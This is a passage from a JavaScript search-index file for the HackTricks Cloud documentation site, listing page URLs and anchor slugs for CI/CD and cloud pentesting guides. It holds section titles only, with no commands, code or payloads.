window.search = Object.assign(window.search, JSON.parse('{"doc_urls":["index.html#hacktricks-cloud","index.html#run-hacktricks-cloud-locally","index.html#pentesting-cicd-methodology","index.html#pentesting-cloud-methodology","index.html#license--disclaimer","index.html#github-stats","pentesting-ci-cd/pentesting-ci-cd-methodology.html#pentesting-cicd-methodology","pentesting-ci-cd/pentesting-ci-cd-methodology.html#vcs","pentesting-ci-cd/pentesting-ci-cd-methodology.html#cicd-pipelines","pentesting-ci-cd/pentesting-ci-cd-methodology.html#vcs-pentesting-methodology","pentesting-ci-cd/pentesting-ci-cd-methodology.html#pipelines-pentesting-methodology","pentesting-ci-cd/pentesting-ci-cd-methodology.html#ppe---poisoned-pipeline-execution","pentesting-ci-cd/pentesting-ci-cd-methodology.html#exploitation-benefits","pentesting-ci-cd/pentesting-ci-cd-methodology.html#more-relevant-info","pentesting-ci-cd/pentesting-ci-cd-methodology.html#tools--cis-benchmark","pentesting-ci-cd/pentesting-ci-cd-methodology.html#top-10-cicd-security-risk","pentesting-ci-cd/pentesting-ci-cd-methodology.html#labs","pentesting-ci-cd/pentesting-ci-cd-methodology.html#automatic-tools","pentesting-ci-cd/pentesting-ci-cd-methodology.html#references","pentesting-ci-cd/gitblit-security/index.html#gitblit-security","pentesting-ci-cd/gitblit-security/index.html#what-is-gitblit","pentesting-ci-cd/gitblit-security/index.html#topics","pentesting-ci-cd/gitblit-security/index.html#references","pentesting-ci-cd/gitblit-security/gitblit-embedded-ssh-auth-bypass-cve-2024-28080.html#gitblit-embedded-ssh-auth-bypass-cve-2024-28080","pentesting-ci-cd/gitblit-security/gitblit-embedded-ssh-auth-bypass-cve-2024-28080.html#summary","pentesting-ci-cd/gitblit-security/gitblit-embedded-ssh-auth-bypass-cve-2024-28080.html#root-cause-state-leaks-between-ssh-methods","pentesting-ci-cd/gitblit-security/gitblit-embedded-ssh-auth-bypass-cve-2024-28080.html#stepbystep-exploitation","pentesting-ci-cd/gitblit-security/gitblit-embedded-ssh-auth-bypass-cve-2024-28080.html#impact","pentesting-ci-cd/gitblit-security/gitblit-embedded-ssh-auth-bypass-cve-2024-28080.html#detection-ideas","pentesting-ci-cd/gitblit-security/gitblit-embedded-ssh-auth-bypass-cve-2024-28080.html#mitigations","pentesting-ci-cd/gitblit-security/gitblit-embedded-ssh-auth-bypass-cve-2024-28080.html#general-abusing-ssh-auth-method-stateleakage-minaopensshbased-services","pentesting-ci-cd/gitblit-security/gitblit-embedded-ssh-auth-bypass-cve-2024-28080.html#references","pentesting-ci-cd/github-security/index.html#github-security","pentesting-ci-cd/github-security/index.html#what-is-github","pentesting-ci-cd/github-security/index.html#basic-information","pentesting-ci-cd/github-security/index.html#external-recon","pentesting-ci-cd/github-security/index.html#github-dorks","pentesting-ci-cd/github-security/index.html#github-leaks","pentesting-ci-cd/github-security/index.html#external-forks","pentesting-ci-cd/github-security/index.html#github-leaks-in-deletedinternal-forks","pentesting-ci-cd/github-security/index.html#organization-hardening","pentesting-ci-cd/github-security/index.html#member-privileges","pentesting-ci-cd/github-security/index.html#actions-settings","pentesting-ci-cd/github-security/index.html#integrations","pentesting-ci-cd/github-security/index.html#recon--attacks-abusing-credentials","pentesting-ci-cd/github-security/index.html#with-user-credentials","pentesting-ci-cd/github-security/index.html#with-user-ssh-key","pentesting-ci-cd/github-security/index.html#with-user-token","pentesting-ci-cd/github-security/index.html#with-oauth-application","pentesting-ci-cd/github-security/index.html#with-github-application","pentesting-ci-cd/github-security/index.html#compromise--abuse-github-action","pentesting-ci-cd/github-security/index.html#abusing-thirdparty-github-apps-running-external-tools-rubocop-extension-rce","pentesting-ci-cd/github-security/index.html#branch-protection-bypass","pentesting-ci-cd/github-security/index.html#bypass-environments-protections","pentesting-ci-cd/github-security/index.html#persistence","pentesting-ci-cd/github-security/index.html#imposter-commits---backdoor-via-repo-commits","pentesting-ci-cd/github-security/index.html#references","pentesting-ci-cd/github-security/abusing-github-actions/index.html#abusing-github-actions","pentesting-ci-cd/github-security/abusing-github-actions/index.html#tools","pentesting-ci-cd/github-security/abusing-github-actions/index.html#basic-information","pentesting-ci-cd/github-security/abusing-github-actions/index.html#impacts-summary","pentesting-ci-cd/github-security/abusing-github-actions/index.html#github_token","pentesting-ci-cd/github-security/abusing-github-actions/index.html#allowed-execution","pentesting-ci-cd/github-security/abusing-github-actions/index.html#execution-from-repo-creation","pentesting-ci-cd/github-security/abusing-github-actions/index.html#execution-from-a-new-branch","pentesting-ci-cd/github-security/abusing-github-actions/index.html#forked-execution","pentesting-ci-cd/github-security/abusing-github-actions/index.html#pull_request","pentesting-ci-cd/github-security/abusing-github-actions/index.html#pull_request_target","pentesting-ci-cd/github-security/abusing-github-actions/index.html#workflow_run","pentesting-ci-cd/github-security/abusing-github-actions/index.html#workflow_call","pentesting-ci-cd/github-security/abusing-github-actions/index.html#abusing-forked-execution","pentesting-ci-cd/github-security/abusing-github-actions/index.html#untrusted-checkout-execution","pentesting-ci-cd/github-security/abusing-github-actions/index.html#context-script-injections","pentesting-ci-cd/github-security/abusing-github-actions/index.html#github_env-script-injection","pentesting-ci-cd/github-security/abusing-github-actions/index.html#dependabot-and-other-trusted-bots","pentesting-ci-cd/github-security/abusing-github-actions/index.html#vulnerable-third-party-github-actions","pentesting-ci-cd/github-security/abusing-github-actions/index.html#other-external-access","pentesting-ci-cd/github-security/abusing-github-actions/index.html#deleted-namespace-repo-hijacking","pentesting-ci-cd/github-security/abusing-github-actions/index.html#repo-pivoting","pentesting-ci-cd/github-security/abusing-github-actions/index.html#cache-poisoning","pentesting-ci-cd/github-security/abusing-github-actions/index.html#artifact-poisoning","pentesting-ci-cd/github-security/abusing-github-actions/index.html#post-exploitation-from-an-action","pentesting-ci-cd/github-security/abusing-github-actions/index.html#github-action-policies-bypass","pentesting-ci-cd/github-security/abusing-github-actions/index.html#accessing-aws-and-gcp-via-oidc","pentesting-ci-cd/github-security/abusing-github-actions/index.html#accessing-secrets","pentesting-ci-cd/github-security/abusing-github-actions/index.html#abusing-self-hosted-runners","pentesting-ci-cd/github-security/abusing-github-actions/index.html#github-docker-images-registry","pentesting-ci-cd/github-security/abusing-github-actions/index.html#sensitive-info-in-github-actions-logs","pentesting-ci-cd/github-security/abusing-github-actions/index.html#covering-your-tracks","pentesting-ci-cd/github-security/abusing-github-actions/index.html#references","pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.html#gh-actions---artifact-poisoning","pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.html#gh-actions---cache-poisoning","pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.html#gh-actions---context-script-injections","pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.html#understanding-the-risk","pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.html#vulnerable-pattern--rce-on-runner","pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.html#safe-pattern-shell-variables-via-env","pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.html#reader-triggerable-surfaces-treat-as-untrusted","pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.html#practical-tips","pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.html#references","pentesting-ci-cd/github-security/accessible-deleted-data-in-github.html#accessible-deleted-data-in-github","pentesting-ci-cd/github-security/accessible-deleted-data-in-github.html#accessing-deleted-fork-data","pentesting-ci-cd/github-security/accessible-deleted-data-in-github.html#accessing-deleted-repo-data","pentesting-ci-cd/github-security/accessible-deleted-data-in-github.html#accessing-private-repo-data","pentesting-ci-cd/github-security/accessible-deleted-data-in-github.html#how-to-discover-commits-from-deletedhidden-forks","pentesting-ci-cd/github-security/accessible-deleted-data-in-github.html#directly-accessing-the-commit","pentesting-ci-cd/github-security/accessible-deleted-data-in-github.html#brute-forcing-short-sha-1-values","pentesting-ci-cd/github-security/accessible-deleted-data-in-github.html#references","pentesting-ci-cd/github-security/basic-github-information.html#basic-github-information","pentesting-ci-cd/github-security/basic-github-information.html#basic-structure","pentesting-ci-cd/github-security/basic-github-information.html#privileges","pentesting-ci-cd/github-security/basic-github-information.html#enterprise-roles","pentesting-ci-cd/github-security/basic-github-information.html#organization-roles","pentesting-ci-cd/github-security/basic-github-information.html#members-privileges","pentesting-ci-cd/github-security/basic-github-information.html#repository-roles","pentesting-ci-cd/github-security/basic-github-information.html#teams","pentesting-ci-cd/github-security/basic-github-information.html#users","pentesting-ci-cd/github-security/basic-github-information.html#github-authentication","pentesting-ci-cd/github-security/basic-github-information.html#web-access","pentesting-ci-cd/github-security/basic-github-information.html#ssh-keys","pentesting-ci-cd/github-security/basic-github-information.html#personal-access-tokens","pentesting-ci-cd/github-security/basic-github-information.html#oauth-applications","pentesting-ci-cd/github-security/basic-github-information.html#github-applications","pentesting-ci-cd/github-security/basic-github-information.html#github-actions","pentesting-ci-cd/github-security/basic-github-information.html#git-actions","pentesting-ci-cd/github-security/basic-github-information.html#configuration","pentesting-ci-cd/github-security/basic-github-information.html#git-secrets","pentesting-ci-cd/github-security/basic-github-information.html#git-environments","pentesting-ci-cd/github-security/basic-github-information.html#git-action-runner","pentesting-ci-cd/github-security/basic-github-information.html#git-action-compromise","pentesting-ci-cd/github-security/basic-github-information.html#branch-protections","pentesting-ci-cd/github-security/basic-github-information.html#tag-protections","pentesting-ci-cd/github-security/basic-github-information.html#references","pentesting-ci-cd/gitea-security/index.html#gitea-security","pentesting-ci-cd/gitea-security/index.html#what-is-gitea","pentesting-ci-cd/gitea-security/index.html#basic-information","pentesting-ci-cd/gitea-security/index.html#lab","pentesting-ci-cd/gitea-security/index.html#unauthenticated-enumeration","pentesting-ci-cd/gitea-security/index.html#internal-exploitation","pentesting-ci-cd/gitea-security/index.html#with-user-credentialsweb-cookie","pentesting-ci-cd/gitea-security/index.html#with-user-ssh-key","pentesting-ci-cd/gitea-security/index.html#with-user-token","pentesting-ci-cd/gitea-security/index.html#with-oauth-application","pentesting-ci-cd/gitea-security/index.html#branch-protection-bypass","pentesting-ci-cd/gitea-security/index.html#enumerate-webhooks","pentesting-ci-cd/gitea-security/index.html#post-exploitation","pentesting-ci-cd/gitea-security/index.html#inside-the-server","pentesting-ci-cd/gitea-security/basic-gitea-information.html#basic-gitea-information","pentesting-ci-cd/gitea-security/basic-gitea-information.html#basic-structure","pentesting-ci-cd/gitea-security/basic-gitea-information.html#permissions","pentesting-ci-cd/gitea-security/basic-gitea-information.html#organizations","pentesting-ci-cd/gitea-security/basic-gitea-information.html#teams--users","pentesting-ci-cd/gitea-security/basic-gitea-information.html#gitea-authentication","pentesting-ci-cd/gitea-security/basic-gitea-information.html#web-access","pentesting-ci-cd/gitea-security/basic-gitea-information.html#ssh-keys","pentesting-ci-cd/gitea-security/basic-gitea-information.html#personal-access-tokens","pentesting-ci-cd/gitea-security/basic-gitea-information.html#oauth-applications","pentesting-ci-cd/gitea-security/basic-gitea-information.html#deploy-keys","pentesting-ci-cd/gitea-security/basic-gitea-information.html#branch-protections","pentesting-ci-cd/concourse-security/index.html#concourse-security","pentesting-ci-cd/concourse-security/index.html#basic-information","pentesting-ci-cd/concourse-security/index.html#concourse-architecture","pentesting-ci-cd/concourse-security/index.html#concourse-lab","pentesting-ci-cd/concourse-security/index.html#enumerate--attack-concourse","pentesting-ci-cd/concourse-security/concourse-architecture.html#concourse-architecture","pentesting-ci-cd/concourse-security/concourse-architecture.html#concourse-architecture-1","pentesting-ci-cd/concourse-security/concourse-architecture.html#architecture","pentesting-ci-cd/concourse-security/concourse-architecture.html#references","pentesting-ci-cd/concourse-security/concourse-lab-creation.html#concourse-lab-creation","pentesting-ci-cd/concourse-security/concourse-lab-creation.html#testing-environment","pentesting-ci-cd/concourse-security/concourse-lab-creation.html#running-concourse","pentesting-ci-cd/concourse-security/concourse-lab-creation.html#create-pipeline","pentesting-ci-cd/concourse-security/concourse-lab-creation.html#steps","pentesting-ci-cd/concourse-security/concourse-lab-creation.html#simple-pipeline-example","pentesting-ci-cd/concourse-security/concourse-lab-creation.html#bash-script-with-outputinput-pipeline","pentesting-ci-cd/concourse-security/concourse-lab-creation.html#triggers","pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.html#concourse-enumeration--attacks","pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.html#concourse-enumeration--attacks-1","pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.html#user-roles--permissions","pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.html#vars--credential-manager","pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.html#concourse-enumeration","pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.html#concourse-attacks","pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.html#references","pentesting-ci-cd/circleci-security.html#circleci-security","pentesting-ci-cd/circleci-security.html#basic-information","pentesting-ci-cd/circleci-security.html#permissions","pentesting-ci-cd/circleci-security.html#env-variables--secrets","pentesting-ci-cd/circleci-security.html#attacks","pentesting-ci-cd/travisci-security/index.html#travisci-security","pentesting-ci-cd/travisci-security/index.html#what-is-travisci","pentesting-ci-cd/travisci-security/index.html#attacks","pentesting-ci-cd/travisci-security/index.html#triggers","pentesting-ci-cd/travisci-security/index.html#third-party-pr","pentesting-ci-cd/travisci-security/index.html#dumping-secrets","pentesting-ci-cd/travisci-security/index.html#todo","pentesting-ci-cd/travisci-security/index.html#travisci-enterprise","pentesting-ci-cd/travisci-security/index.html#references","pentesting-ci-cd/travisci-security/basic-travisci-information.html#basic-travisci-information","pentesting-ci-cd/travisci-security/basic-travisci-information.html#access","pentesting-ci-cd/travisci-security/basic-travisci-information.html#encrypted-secrets","pentesting-ci-cd/travisci-security/basic-travisci-information.html#environment-variables","pentesting-ci-cd/travisci-security/basic-travisci-information.html#custom-encrypted-secrets","pentesting-ci-cd/travisci-security/basic-travisci-information.html#custom-encrypted-files","pentesting-ci-cd/travisci-security/basic-travisci-information.html#travisci-enterprise","pentesting-ci-cd/jenkins-security/index.html#jenkins-security","pentesting-ci-cd/jenkins-security/index.html#basic-information","pentesting-ci-cd/jenkins-security/index.html#unauthenticated-enumeration","pentesting-ci-cd/jenkins-security/index.html#known-vulnerabilities","pentesting-ci-cd/jenkins-security/index.html#login","pentesting-ci-cd/jenkins-security/index.html#register","pentesting-ci-cd/jenkins-security/index.html#sso-login","pentesting-ci-cd/jenkins-security/index.html#bruteforce","pentesting-ci-cd/jenkins-security/index.html#password-spraying","pentesting-ci-cd/jenkins-security/index.html#ip-whitelisting-bypass","pentesting-ci-cd/jenkins-security/index.html#internal-jenkins-abuses","pentesting-ci-cd/jenkins-security/index.html#listing-users","pentesting-ci-cd/jenkins-security/index.html#dumping-builds-to-find-cleartext-secrets","pentesting-ci-cd/jenkins-security/index.html#stealing-ssh-credentials","pentesting-ci-cd/jenkins-security/index.html#rce-in-jenkins","pentesting-ci-cd/jenkins-security/index.html#rce-creatingmodifying-a-project","pentesting-ci-cd/jenkins-security/index.html#rce-execute-groovy-script","pentesting-ci-cd/jenkins-security/index.html#rce-creatingmodifying-pipeline","pentesting-ci-cd/jenkins-security/index.html#pipeline-exploitation","pentesting-ci-cd/jenkins-security/index.html#build-pipelines","pentesting-ci-cd/jenkins-security/index.html#pipeline-rce","pentesting-ci-cd/jenkins-security/index.html#checking-env-variables","pentesting-ci-cd/jenkins-security/index.html#dumping-secrets","pentesting-ci-cd/jenkins-security/index.html#triggers","pentesting-ci-cd/jenkins-security/index.html#nodes--agents","pentesting-ci-cd/jenkins-security/index.html#complete-example","pentesting-ci-cd/jenkins-security/index.html#arbitrary-file-read-to-rce","pentesting-ci-cd/jenkins-security/index.html#rce","pentesting-ci-cd/jenkins-security/index.html#post-exploitation","pentesting-ci-cd/jenkins-security/index.html#metasploit","pentesting-ci-cd/jenkins-security/index.html#jenkins-secrets","pentesting-ci-cd/jenkins-security/index.html#create-new-admin-user","pentesting-ci-cd/jenkins-security/index.html#references","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#basic-jenkins-information","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#access","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#username--password","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#cookie","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#ssoplugins","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#tokens","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#ssh-keys","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#authorization","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#security-realm","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#jenkins-nodes-agents--executors","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#jenkins-secrets","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#encryption-of-secrets-and-credentials","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#credentials-access","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#references","pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.html#jenkins-rce-with-groovy-script","pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.html#jenkins-rce-with-groovy-script-1","pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.html#reverse-shell-in-linux","pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.html#reverse-shell-in-windows","pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.html#script","pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.html#jenkins-rce-creatingmodifying-project","pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.html#creating-a-project","pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.html#modifying-a-project","pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.html#execution","pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.html#jenkins-rce-creatingmodifying-pipeline","pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.html#creating-a-new-pipeline","pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.html#modifying-a-pipeline","pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.html#jenkins-arbitrary-file-read-to-rce-via-remember-me","pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.html#attack-prerequisites","pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.html#detailed-exploitation-process","pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.html#jenkins-dumping-secrets-from-groovy","pentesting-ci-cd/apache-airflow-security/index.html#apache-airflow-security","pentesting-ci-cd/apache-airflow-security/index.html#basic-information","pentesting-ci-cd/apache-airflow-security/index.html#local-lab","pentesting-ci-cd/apache-airflow-security/index.html#airflow-configuration","pentesting-ci-cd/apache-airflow-security/index.html#airflow-rbac","pentesting-ci-cd/apache-airflow-security/index.html#attacks","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#airflow-configuration","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#configuration-file","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#api","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#atlas","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#celery","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#core","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#dask","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#kerberos","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#logging","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#secrets","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#smtp","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#webserver","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#web-authentication","pentesting-ci-cd/apache-airflow-security/airflow-rbac.html#airflow-rbac","pentesting-ci-cd/apache-airflow-security/airflow-rbac.html#rbac","pentesting-ci-cd/apache-airflow-security/airflow-rbac.html#default-permissions","pentesting-ci-cd/terraform-security.html#terraform-security","pentesting-ci-cd/terraform-security.html#basic-information","pentesting-ci-cd/terraform-security.html#terraform-lab","pentesting-ci-cd/terraform-security.html#rce-in-terraform-config-file-poisoning","pentesting-ci-cd/terraform-security.html#terraform-plan","pentesting-ci-cd/terraform-security.html#terraform-apply","pentesting-ci-cd/terraform-security.html#secrets-dumps","pentesting-ci-cd/terraform-security.html#abusing-terraform-state-files","pentesting-ci-cd/terraform-security.html#rce-in-terraform-config-file-poisoning-1","pentesting-ci-cd/terraform-security.html#deleting-resources","pentesting-ci-cd/terraform-security.html#replace-blacklisted-provider","pentesting-ci-cd/terraform-security.html#terraform-cloud-speculative-plan-rce-and-credential-exfiltration","pentesting-ci-cd/terraform-security.html#compromising-terraform-cloud","pentesting-ci-cd/terraform-security.html#using-a-token","pentesting-ci-cd/terraform-security.html#escaping-to-the-cloud","pentesting-ci-cd/terraform-security.html#automatic-audit-tools","pentesting-ci-cd/terraform-security.html#snyk-infrastructure-as-code-iac","pentesting-ci-cd/terraform-security.html#checkov","pentesting-ci-cd/terraform-security.html#terraform-compliance","pentesting-ci-cd/terraform-security.html#tfsec","pentesting-ci-cd/terraform-security.html#kicks","pentesting-ci-cd/terraform-security.html#terrascan","pentesting-ci-cd/terraform-security.html#references","pentesting-ci-cd/atlantis-security.html#atlantis-security","pentesting-ci-cd/atlantis-security.html#basic-information","pentesting-ci-cd/atlantis-security.html#local-lab","pentesting-ci-cd/atlantis-security.html#atlantis-access","pentesting-ci-cd/atlantis-security.html#server-configuration","pentesting-ci-cd/atlantis-security.html#atlantis-commands","pentesting-ci-cd/atlantis-security.html#attacks","pentesting-ci-cd/atlantis-security.html#post-exploitation","pentesting-ci-cd/atlantis-security.html#mitigations","pentesting-ci-cd/atlantis-security.html#references","pentesting-ci-cd/cloudflare-security/index.html#cloudflare-security","pentesting-ci-cd/cloudflare-security/index.html#websites","pentesting-ci-cd/cloudflare-security/index.html#domain-registration","pentesting-ci-cd/cloudflare-security/index.html#analytics","pentesting-ci-cd/cloudflare-security/index.html#pages","pentesting-ci-cd/cloudflare-security/index.html#workers","pentesting-ci-cd/cloudflare-security/index.html#r2","pentesting-ci-cd/cloudflare-security/index.html#stream","pentesting-ci-cd/cloudflare-security/index.html#images","pentesting-ci-cd/cloudflare-security/index.html#security-center","pentesting-ci-cd/cloudflare-security/index.html#turnstile","pentesting-ci-cd/cloudflare-security/index.html#zero-trust","pentesting-ci-cd/cloudflare-security/index.html#bulk-redirects","pentesting-ci-cd/cloudflare-security/index.html#notifications","pentesting-ci-cd/cloudflare-security/index.html#manage-account","pentesting-ci-cd/cloudflare-security/index.html#ddos-investigation","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#cloudflare-domains","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#overview","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#analytics","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#dns","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#email","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#spectrum","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#ssltls","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#security","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#access","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#speed","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#caching","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#workers-routes","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#rules","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#network","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#traffic","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#custom-pages","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#apps","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#scrape-shield","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#zaraz","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#web3","pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.html#cloudflare-zero-trust-network","pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.html#analytics","pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.html#gateway","pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.html#access","pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.html#my-team","pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.html#logs","pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.html#settings","pentesting-ci-cd/okta-security/index.html#okta-security","pentesting-ci-cd/okta-security/index.html#basic-information","pentesting-ci-cd/okta-security/index.html#summary","pentesting-ci-cd/okta-security/index.html#attacks","pentesting-ci-cd/okta-security/index.html#locating-okta-portal","pentesting-ci-cd/okta-security/index.html#login-in-okta-via-kerberos","pentesting-ci-cd/okta-security/index.html#hijacking-okta-ad-agent","pentesting-ci-cd/okta-security/index.html#hijacking-ad-as-an-admin","pentesting-ci-cd/okta-security/index.html#okta-fake-saml-provider","pentesting-ci-cd/okta-security/index.html#phishing-okta-portal-with-evilgnix","pentesting-ci-cd/okta-security/index.html#colleague-impersonation-attack","pentesting-ci-cd/okta-security/index.html#evading-behavioural-detection-policies","pentesting-ci-cd/okta-security/index.html#okta-hardening","pentesting-ci-cd/okta-security/index.html#references","pentesting-ci-cd/okta-security/okta-hardening.html#okta-hardening","pentesting-ci-cd/okta-security/okta-hardening.html#directory","pentesting-ci-cd/okta-security/okta-hardening.html#people","pentesting-ci-cd/okta-security/okta-hardening.html#groups","pentesting-ci-cd/okta-security/okta-hardening.html#devices","pentesting-ci-cd/okta-security/okta-hardening.html#profile-editor","pentesting-ci-cd/okta-security/okta-hardening.html#directory-integrations","pentesting-ci-cd/okta-security/okta-hardening.html#profile-sources","pentesting-ci-cd/okta-security/okta-hardening.html#customizations","pentesting-ci-cd/okta-security/okta-hardening.html#brands","pentesting-ci-cd/okta-security/okta-hardening.html#sms","pentesting-ci-cd/okta-security/okta-hardening.html#end-user-dashboard","pentesting-ci-cd/okta-security/okta-hardening.html#other","pentesting-ci-cd/okta-security/okta-hardening.html#applications","pentesting-ci-cd/okta-security/okta-hardening.html#applications-1","pentesting-ci-cd/okta-security/okta-hardening.html#identity-governance","pentesting-ci-cd/okta-security/okta-hardening.html#access-certifications","pentesting-ci-cd/okta-security/okta-hardening.html#security","pentesting-ci-cd/okta-security/okta-hardening.html#general","pentesting-ci-cd/okta-security/okta-hardening.html#healthinsight","pentesting-ci-cd/okta-security/okta-hardening.html#authenticators","pentesting-ci-cd/okta-security/okta-hardening.html#authentication-policies","pentesting-ci-cd/okta-security/okta-hardening.html#global-session-policy","pentesting-ci-cd/okta-security/okta-hardening.html#identity-providers","pentesting-ci-cd/okta-security/okta-hardening.html#delegated-authentication","pentesting-ci-cd/okta-security/okta-hardening.html#network","pentesting-ci-cd/okta-security/okta-hardening.html#device-integrations","pentesting-ci-cd/okta-security/okta-hardening.html#api","pentesting-ci-cd/okta-security/okta-hardening.html#workflow","pentesting-ci-cd/okta-security/okta-hardening.html#automations","pentesting-ci-cd/okta-security/okta-hardening.html#reports","pentesting-ci-cd/okta-security/okta-hardening.html#reports-1","pentesting-ci-cd/okta-security/okta-hardening.html#system-log","pentesting-ci-cd/okta-security/okta-hardening.html#import-monitoring","pentesting-ci-cd/okta-security/okta-hardening.html#rate-limits","pentesting-ci-cd/okta-security/okta-hardening.html#settings","pentesting-ci-cd/okta-security/okta-hardening.html#account","pentesting-ci-cd/okta-security/okta-hardening.html#downloads","pentesting-ci-cd/serverless.com-security.html#serverlesscom-security","pentesting-ci-cd/serverless.com-security.html#basic-information","pentesting-ci-cd/serverless.com-security.html#organization","pentesting-ci-cd/serverless.com-security.html#team","pentesting-ci-cd/serverless.com-security.html#application","pentesting-ci-cd/serverless.com-security.html#services","pentesting-ci-cd/serverless.com-security.html#tutorial","pentesting-ci-cd/serverless.com-security.html#security-review-of-serverlesscom","pentesting-ci-cd/serverless.com-security.html#misconfigured-iam-roles-and-permissions","pentesting-ci-cd/serverless.com-security.html#insecure-secrets-and-configuration-management","pentesting-ci-cd/serverless.com-security.html#vulnerable-code-and-dependencies","pentesting-ci-cd/serverless.com-security.html#inadequate-logging-and-monitoring","pentesting-ci-cd/serverless.com-security.html#insecure-api-gateway-configurations","pentesting-ci-cd/serverless.com-security.html#insufficient-function-isolation","pentesting-ci-cd/serverless.com-security.html#inadequate-data-protection","pentesting-ci-cd/serverless.com-security.html#lack-of-proper-error-handling","pentesting-ci-cd/supabase-security.html#supabase-security","pentesting-ci-cd/supabase-security.html#basic-information","pentesting-ci-cd/supabase-security.html#subdomain","pentesting-ci-cd/supabase-security.html#database-configuration","pentesting-ci-cd/supabase-security.html#api-configuration","pentesting-ci-cd/supabase-security.html#anon-api-keys","pentesting-ci-cd/supabase-security.html#secret--service_role-api-keys","pentesting-ci-cd/supabase-security.html#jwt-secret","pentesting-ci-cd/supabase-security.html#authentication","pentesting-ci-cd/supabase-security.html#signups","pentesting-ci-cd/supabase-security.html#passwords--sessions","pentesting-ci-cd/supabase-security.html#smtp-settings","pentesting-ci-cd/supabase-security.html#advanced-settings","pentesting-ci-cd/supabase-security.html#storage","pentesting-ci-cd/supabase-security.html#edge-functions","pentesting-ci-cd/ansible-tower-awx-automation-controller-security.html#ansible-tower--awx--automation-controller-security","pentesting-ci-cd/ansible-tower-awx-automation-controller-security.html#basic-information","pentesting-ci-cd/ansible-tower-awx-automation-controller-security.html#differences","pentesting-ci-